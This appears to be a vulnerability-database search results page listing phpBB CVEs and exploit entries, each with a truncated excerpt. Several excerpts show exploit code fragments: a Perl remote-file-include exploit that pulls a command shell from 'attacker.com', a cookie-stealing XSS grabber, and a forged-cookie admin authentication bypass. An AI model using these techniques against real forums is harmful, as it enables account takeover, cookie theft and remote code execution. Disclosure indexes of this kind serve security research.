70 matches found
CVE-2006-6840
Unspecified vulnerability in phpBB before 2.0.22 has unknown impact and remote attack vectors related to a "negative start parameter."...
phpBB < 2.0.22 Multiple Vulnerabilities
Binary data 3874.prm...
CVE-2006-6508
Cross-site request forgery CSRF vulnerability in phpBB 2.0.21 allows remote authenticated users to send unauthorized messages as an arbitrary user via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information...
phpbbsecurity-rfi.txt
!/usr/bin/perl phpBB Security 1.0.1 Class: Remote File Include Vulnerability Date: 2006/10/12 Remote: Yes Type: high Site: http://www.phpbb-amod.com/downloads/phpBBSecurity.zip use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd ! "END" $socket =...
phpBB Security <= 1.0.1 (php_security.php) Remote File Include Exploit
Exploit for unknown platform in category web applications ====================================================================== phpBB Security = 1.0.1 phpsecurity.php Remote File Include Exploit ====================================================================== !/usr/bin/perl phpBB Security...
phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion
!/usr/bin/perl phpBB Security 1.0.1 Class: Remote File Include Vulnerability Date: 2006/10/12 Remote: Yes Type: high Site: http://www.phpbb-amod.com/downloads/phpBBSecurity.zip use IO::Socket; use LWP::Simple;...
phpBB Security <= 1.0.1 (php_security.php) Remote File Include Exploit
No description provided by source. !/usr/bin/perl phpBB Security 1.0.1 Class: Remote File Include Vulnerability Date: 2006/10/12 Remote: Yes Type: high Site: http://www.phpbb-amod.com/downloads/phpBBSecurity.zip...
phpBB Security Suite Mod 1.0.0 (logger_engine.php) Remote File Include
/ ,, / / '-./.-' .--' '--. / / /"" SpiderZ Hacking Security | | | | / / '..' Author: SpiderZ Security Suite IP Logger Remote File Inclusion Vulnerability For: phpBB 2.0.x - 2.0.21 Site: www.spiderz.altervista.org Site02: www.spiderz.netsons.org Remote File Inclusion - Security Suite IP Logger...
phpBB Security Suite Mod 1.0.0 (logger_engine.php) Remote File Include
/ ,, / / '-./.-' .--' '--. / / /"" SpiderZ Hacking Security | | | | / / '..' Author: SpiderZ Dimension of phpBB Remote File Inclusion Vulnerability For: Dimension of phpBB 0.2.5 phpBB 2.0.21 Site: www.spiderz.altervista.org Site02: www.spiderz.netsons.org Remote File Inclusion...
phpBB Security Suite Mod 1.0.0 - logger_engine.php Remote File Inclusion
phpBB Security Suite Mod 1.0.0 - loggerengine.php Remote File Inclusion / \ \ \ ,, / / '-./.-' .--' '--. / / /""\ \ \ SpiderZ Hacking Security | | | | \ \ / / '..' Author: SpiderZ Security Suite IP Logger Remote File Inclusion Vulnerability For: phpBB 2.0.x - 2.0.21 Site:...
phpBB Security Suite Mod 1.0.0 - 'logger_engine.php' Remote File Inclusion
/ \ \ \ ,, / / '-./.-' .--' '--. / / /""\ \ \ SpiderZ Hacking Security | | | | \ \ / / '..' Author: SpiderZ Security Suite IP Logger Remote File Inclusion Vulnerability For: phpBB 2.0.x - 2.0.21 Site: www.spiderz.altervista.org Site02: www.spiderz.netsons.org Remote File Inclusion - Security Suit...
CVE-2006-0632
The genrandstring function in phpBB 2.0.19 uses insufficiently random data small value space to create the activation key "validation ID" that is sent by e-mail when establishing a password, which makes it easier for remote attackers to obtain the key and modify passwords for existing accounts or...
phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber)
// Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/ IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.''; fclose$fp; ? //rename it to cookies.php and create one new file steal.php and chmod it to 777 milw0rm.com 2005-07-13...
phpBB < 2.0.17 Nested BBCode URL Tags XSS
Binary data 3051.prm...
phpBB < 2.0.16 viewtopic.php Arbitrary Code Execution
Binary data 3038.prm...
phpBB Remote - mod.php SQL Injection
phpBB Remote - mod.php SQL Injection source: https://www.securityfocus.com/bid/13209/info A remote SQL injection vulnerability affects the datenbank module for phpbb. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. A...
phpBB up.php Arbitrary File Upload
The installed version of phpBB on the remote host includes a file upload script intended as a way for users to upload files that they can then link to in their posts. The script, however, does not require authentication, makes only a limited check of upload file types, and stores uploads in a kno...
phpBB 2.0.12 - Change User Rights Authentication Bypass
!/usr/bin/perl -w phpBB new ; my $cookiejar = HTTP::Cookies-new ; $browser-cookiejar $cookiejar ; $cookiejar-setcookie "0","phpbb2mysqldata", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,; if defined $proxy $proxy = s/http:////eg;...
phpBB 2.0.12 - Session Handling Authentication Bypass
phpBB 2.0.12 - Session Handling Authentication Bypass phpBB 2.0.12 Session Handling Authentication Bypass .. easy to use exploit .. YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM.. 1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made : 3- Close the Browser .. 2-...
[SA14413] phpBB "autologinid" Security Bypass
---------------------------------------------------------------------- Monitor, Filter, and Manage Security Information - Filtering and Management of Secunia advisories - Overview, documentation, and detailed reports - Alerting via email and SMS Request Trial: https://ca.secunia.com/?f=l...